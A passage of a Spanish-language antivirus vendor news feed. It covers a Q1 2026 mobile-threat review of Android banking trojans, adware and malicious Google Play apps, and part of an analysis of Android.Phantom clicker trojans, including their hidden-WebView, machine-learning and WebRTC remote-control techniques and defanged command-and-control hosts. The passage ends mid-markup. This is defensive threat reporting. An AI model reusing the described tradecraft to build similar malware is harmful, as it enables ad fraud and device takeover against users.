        &lt;li&gt;Los troyanos bancarios &lt;a href="https://vms.dr-web.es/search/?q=Android.Banker&amp;lng=es"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; se convirtieron en las amenazas para Android más extendidas&lt;/li&gt;
        &lt;li&gt;Los atacantes empezaron a utilizar con mayor frecuencia herramientas de modding de programas Android con el fin de proteger los troyanos bancarios&lt;/li&gt;
        &lt;li&gt;Continuó el descenso de la actividad de los troyanos publicitarios &lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;Se difundieron las aplicaciones troyanas &lt;b&gt;Android.Phantom&lt;/b&gt;, que utilizan aprendizaje&lt;/li&gt;
        &lt;li&gt;Se detectó nuevo malware en el catálogo Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Según los datos Dr.Web Security Space para dispositivos móviles&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.80.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Troyano bancario que intercepta SMS con códigos de un solo uso de entidades de crédito, el contenido de las notificaciones y también recopila otra información confidencial. Esta incluye datos técnicos sobre el dispositivo infectado, la lista de aplicaciones instaladas, información sobre la tarjeta SIM, llamadas telefónicas, SMS recibidos y enviados.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.FakeApp&amp;lng=es"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Troyano que carga el sitio web especificado en su configuración. Las modificaciones conocidas de este malware cargan un sitio de casino en línea.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.675.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Troyano destinado a mostrar publicidad intrusiva. Los representantes de la familia &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; suelen difundirse bajo la apariencia de aplicaciones inofensivas y, en algunos casos, otro malware los instala en el directorio del sistema. Una vez en los dispositivos Android, estos troyanos publicitarios suelen ocultar al usuario su presencia en el sistema; por ejemplo, «esconden» el icono de la aplicación del menú de la pantalla principal.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de un ofuscador que, entre otras cosas, se utiliza para proteger malware (por ejemplo, algunas versiones de los troyanos bancarios &lt;b&gt;Android.SpyMax&lt;/b&gt;).&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.Click&amp;lng=es"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de mods maliciosos del messenger WhatsApp, que pueden cargar diversos sitios en segundo plano sin autorización del usuario.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de programas publicitarios que imitan el funcionamiento del software antivirus. Estos programas pueden informar de amenazas inexistentes e inducir a error a los usuarios, exigiendo el pago de la versión completa.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de aplicaciones que supuestamente permiten ganar dinero realizando una u otra acción o tarea. Estos programas simulan el abono de recompensas, y para retirar el dinero «ganado» es necesario acumular una determinada cantidad. Normalmente incluyen una lista de sistemas de pago y bancos populares a través de los cuales supuestamente es posible retirar las recompensas. Pero incluso cuando los usuarios consiguen acumular una cantidad suficiente para la retirada, los pagos prometidos no llegan. Esta detección también identifica otro software no deseado basado en el código de esos programas.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.CloudInject&amp;lng=es"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.CloudInject&amp;lng=es"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de aplicaciones Android modificadas con ayuda del servicio en la nube CloudInject y de la utilidad Android del mismo nombre (añadida a la base de virus de Dr.Web como &lt;a href="https://vms.dr-web.es/search/?q=Tool.CloudInject&amp;lng=es"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Estos programas se modifican en un servidor remoto, y el usuario interesado en su modificación (modder) no controla qué es exactamente lo que se integrará en ellos. Además, las aplicaciones reciben un conjunto de permisos peligrosos. Una vez modificados los programas, el modder puede administrarlos a distancia: bloquearlos, mostrar diálogos configurables, rastrear la instalación y desinstalación de otro software, etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programa de vigilancia de los titulares de dispositivos Android. Permite leer SMS, obtener información sobre llamadas telefónicas, rastrear la ubicación del dispositivo y realizar grabaciones de audio del entorno.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Tool.Obfuscator.TrashCode&amp;lng=es"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Tool.Obfuscator.TrashCode&amp;lng=es"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de programas Android a los que, con ayuda de herramientas de hacking para el modding de aplicaciones, se ha añadido código basura. Esta modificación se realiza con el fin de confundir la lógica de los programas. Esta técnica es frecuente en los troyanos bancarios y en las versiones pirata de software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de aplicaciones Android modificadas con ayuda de la utilidad NP Manager. Esta utilidad contiene módulos para la ofuscación y protección del código de los programas, así como para eludir la verificación de su firma digital tras la modificación. La ofuscación que añade se utiliza con frecuencia en el malware para dificultar su detección y análisis.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Tool.LuckyPatcher&amp;lng=es"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utilidad que permite modificar aplicaciones Android instaladas (crear parches para ellas) con el fin de cambiar la lógica de su funcionamiento o eludir determinadas restricciones. Por ejemplo, con su ayuda los usuarios pueden intentar desactivar la comprobación del acceso root en programas bancarios u obtener recursos ilimitados en juegos. Para crear parches, la utilidad descarga de internet unos scripts especialmente preparados, que cualquiera puede crear y añadir a la base general. La funcionalidad de dichos scripts puede resultar incluso maliciosa, por lo que los parches creados pueden ser de peligro potencial.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.Bastion&amp;lng=es"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de programas optimizadores que de forma periódica crean notificaciones con mensajes engañosos sobre una supuesta falta de memoria y errores del sistema con el fin de mostrar publicidad durante la «optimización».&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.AdPush&amp;lng=es"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Módulo publicitario que puede integrarse en programas Android. Muestra notificaciones publicitarias que inducen a error a los usuarios. Por ejemplo, estas notificaciones pueden parecerse a mensajes del sistema operativo. Además, este módulo recopila una serie de datos confidenciales y también puede cargar otras aplicaciones e iniciar su instalación.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Aplicaciones que se hacen pasar por herramientas de trucos para obtener recursos en juegos. En realidad, han sido creadas para mostrar publicidad. Estos programas reciben de un servidor remoto una configuración conforme a la cual cargan un sitio objetivo con anuncios: banners, ventanas emergentes, vídeos, etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.Fictus&amp;lng=es"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Módulo publicitario que los atacantes integran en versiones clones de juegos y programas Android populares. Su integración en los programas se realiza mediante un comprimidor especializado net2share. Las copias de software creadas de este modo se distribuyen a través de varios catálogos de aplicaciones y, una vez instaladas, muestran publicidad no deseada.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Módulos de software integrados en aplicaciones Android que muestran diversos tipos de publicidad. En función de la versión y la modificación, puede tratarse de notificaciones publicitarias, ventanas emergentes o banners. Con ayuda de estos módulos, los atacantes suelen distribuir malware, proponiendo instalar uno u otro software. Además, estos módulos transmiten a un servidor remoto la información confidencial de varios tipos.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Amenazas en Google Play&lt;/h3&gt;

&lt;p&gt;En el I trimestre de 2026, los expertos del laboratorio antivirus de Doctor Web detectaron en el catálogo de Google Play nuevo malware &lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, que suscribe a las víctimas a servicios de pago. Los troyanos se ocultaban en diversas utilidades para optimizar el funcionamiento de los dispositivos Android, y también se distribuían bajo la apariencia de messengers, software multimedia y otro tipo de programas. En total, los usuarios los instalaron al menos 370 000 veces.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.1.jpg"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.1.jpg"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Ejemplos de malware &lt;b&gt;Android.Joker&lt;/b&gt; detectado en Google Play en el I trimestre del año 2026. &lt;b&gt;Android.Joker.2511&lt;/b&gt; fue incrustado en el messenger Private Chat Message, y &lt;b&gt;Android.Joker.2524&lt;/b&gt; — en el programa de cámara de fotos Magic Camera&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Además, nuestros analistas de virus detectaron el malware &lt;a href="https://vms.dr-web.es/search/?q=Android.Subscription&amp;lng=es"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.Subscription&amp;lng=es"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;, también destinado a suscribir a los usuarios a servicios de pago. Los troyanos cargan sitios web en los que, mediante la tecnología Wap Click, se activan suscripciones móviles de pago. En estos sitios se solicita a los usuarios el número de teléfono móvil, tras lo cual se intenta activar automáticamente el servicio. Ambas aplicaciones maliciosas fueron descargadas en conjunto desde el catálogo de Google Play más de 1 500 000 veces.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;El malware &lt;b&gt;Android.Subscription.23&lt;/b&gt; y &lt;b&gt;Android.Subscription.24&lt;/b&gt; se distribuía bajo la apariencia de las aplicaciones Stream Hive y Prime Link para la gestión de finanzas personales; sin embargo, su única funcionalidad era cargar sitios para suscribir a los propietarios de dispositivos Android a servicios móviles de pago&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Para proteger los dispositivos Android frente al malware y las aplicaciones no deseadas, recomendamos a los usuarios instalar los productos antivirus Dr.Web para Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q1%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicadores de compromiso&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15110&amp;lng=es</guid><title>Los troyanos de la familia Android.Phantom penetran en smartphones junto con juegos y mods piratas de aplicaciones populares. Usan aprendizaje automático y transmisiones de vídeo para la generación fraudulenta de clics</title><link>https://news.dr-web.es/show/?i=15110&amp;lng=es&amp;c=5</link><pubDate>Wed, 21 Jan 2026 04:00:00 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;21 de enero de 2025&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;newslead&gt;Los expertos del laboratorio antivirus de Doctor Web detectaron e investigaron una nueva familia de troyanos con funcionalidad de clicker. Tienen una peculiaridad en común: se administran desde el servidor &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt;, o se cargan y se ejecutan por comando del mismo. El malware de este tipo infecta smartphones con SO Android.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Uno de los canales de propagación de troyanos es un catálogo oficial de aplicaciones para dispositivos Xiaomi GetApps.&lt;/p&gt;&lt;div class="img img-two-v same-height mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Hemos conseguido rastrear varios juegos móviles que contienen malware: Creation Magic World (más de 32 mil descargas), Cute Pet House (&amp;gt;34 mil descargas), Amazing Unicorn Party (&amp;gt;13 mil descargas), Academia de sueños Sakura (&amp;gt;4 mil descargas), Theft Auto Mafia (&amp;gt;61 mil descargas), Open World Gangsters (&amp;gt;11 mil descargas). Todos los juegos infectados se publicaron en nombre de un solo desarrollador, SHENZHEN RUIREN NETWORK CO., LTD.; los troyanos están incrustados en ellos y se ejecutan junto con las aplicaciones.&lt;/p&gt;&lt;p&gt;En las versiones iniciales de los juegos no había malware. El 28/29 de septiembre, el desarrollador publica actualizaciones para los juegos que tienen incrustado el troyano&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.2.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;. Funciona en dos modos, que en el código del programa se llaman modo de señalización (signaling) y phantom.&lt;/p&gt;&lt;p&gt;En el modo phantom, el malware utiliza un navegador integrado basado en el widget WebView, oculto para el usuario. En el mismo, por orden del servidor &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;, se carga el sitio objetivo para la generación fraudulenta de clics y el archivo JavaScript «phantom». Este último contiene un script para automatizar acciones sobre los anuncios publicitarios del sitio cargado y el framework de aprendizaje automático TensorFlowJS. El modelo para este framework se descarga desde el servidor &lt;span class="string"&gt;hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com&lt;/span&gt; al directorio de la aplicación. En los scripts para trabajar con algunos tipos de publicidad,&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.2.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;coloca el navegador en una pantalla virtual y hace capturas de pantalla. El troyano las analiza mediante el modelo para el framework TensorFlowJS y, después, hace clic en los elementos detectados.&lt;/p&gt;&lt;p&gt;En el modo alternativo signaling, el troyano se conecta a un servidor de terceros mediante WebRTC. Esta tecnología permite a navegadores y aplicaciones establecer una conexión directa para intercambiar datos, audio y vídeo en tiempo real sin instalar software adicional. En el modo signaling, el ya mencionado &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; actúa como servidor de señalización, que establece las conexiones entre los nodos WebRTC. Además, este servidor determina el modo de funcionamiento del troyano, phantom o signaling. Las tareas con los sitios objetivo llegan desde &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;. A continuación,&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.2.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;, de forma oculta para el usuario, transmite a los atacantes el vídeo de la pantalla virtual con el sitio cargado en el navegador. El troyano permite que el nodo WebRTC conectado controle de forma remota el navegador en la pantalla virtual: hacer clic, desplazarse, introducir o pegar texto en el formulario de entrada.&lt;/p&gt;&lt;p&gt;El 15/16 de octubre, los juegos mencionados recibieron otra actualización. Además de&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.2.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;, se incrustó en ellos el módulo&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.5&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. Este actúa como dropper y contiene en su interior el cargador de código remoto&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.4.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;. Este programa descarga varios troyanos más, destinados a imitar clics en distintos sitios. Estos módulos son más básicos que el clicker&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.2.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;: no usan aprendizaje automático ni transmisiones de vídeo, sino que se guían por scripts de clic escritos en JavaScript.&lt;/p&gt;&lt;p&gt;Para usar la tecnología WebRTC en Android, el troyano necesita conectar una biblioteca especial con Java API, que no forma parte del sistema operativo estándar ni de las aplicaciones descargadas. Por ello, al principio el troyano funcionaba principalmente en modo phantom. Al incrustar&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.5&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&amp;nbsp;a las aplicaciones, el troyano&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.2.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;ya pudo usar el cargador de código remoto&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.4.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;para descargar la biblioteca necesaria.&lt;/p&gt;&lt;p&gt;Los malintencionados también usan otros canales de propagación de troyanos&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.2.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;y&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.5&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;. Por ejemplo, mods del servicio de streaming musical Spotify con las funciones premium desbloqueadas. Se publican en distintos sitios web; aquí pueden consultarse algunos ejemplos:&lt;/p&gt;&lt;div class="flex justify-center gap-3"&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Sitio web Spotify Plus&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-3"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Sitio web Spotify Pro&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Y en canales de Telegram especiales:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Pro&lt;/i&gt;&lt;br&gt;&lt;i&gt;(54 400 suscriptores)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Plus – Official&lt;/i&gt;&lt;br&gt;&lt;i&gt;(15 057 suscriptores)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Los mods de Spotify, publicados en sitios web y en los canales de Telegram indicados en las capturas de pantalla, contienen&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Android.Phantom.2.origin&amp;lng=es"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;y la biblioteca para establecer la comunicación mediante el estándar WebRTC en Android.&lt;/p&gt;&lt;p&gt;Además de los mods de Spotify, los atacantes incrustan troyanos en mods de otras aplicaciones populares: YouTube, Deezer, Netflix, etc. Están publicados en sitios especializados en mods:&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Sitio web Apkmody&lt;/i&gt;&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Sitio web Moddroid&lt;/i&gt;&lt;/p&gt;&lt;p&gt;El sitio Moddroid tiene una sección «Selección del editor». De las 20 aplicaciones incluidas, solo 4 estaban limpias. Las otras 16 contenían troyanos de la familia &lt;strong&gt;Android.Phantom&lt;/strong&gt;. Las aplicaciones de estos dos sitios se descargan desde un mismo servidor CDN &lt;span class="string"&gt;hxxps[:]//cdn[.]topmongo[.]com&lt;/span&gt;. Estos sitios tienen sus propios canales de Telegram, donde los usuarios descargan mods infectados con troyanos:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Moddroid.com&lt;/i&gt;&lt;br&gt;&lt;i&gt;(87 653 suscriptores)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Apkmody Chat&lt;/i&gt;&lt;br&gt;&lt;i&gt;(6 297 suscriptores)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Además, para sus fines los delincuentes utilizan servidores de Discord. El más grande de ellos es Spotify X, con unos 24 mil suscriptores.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.png" data-fancybox=""&gt;&lt;img 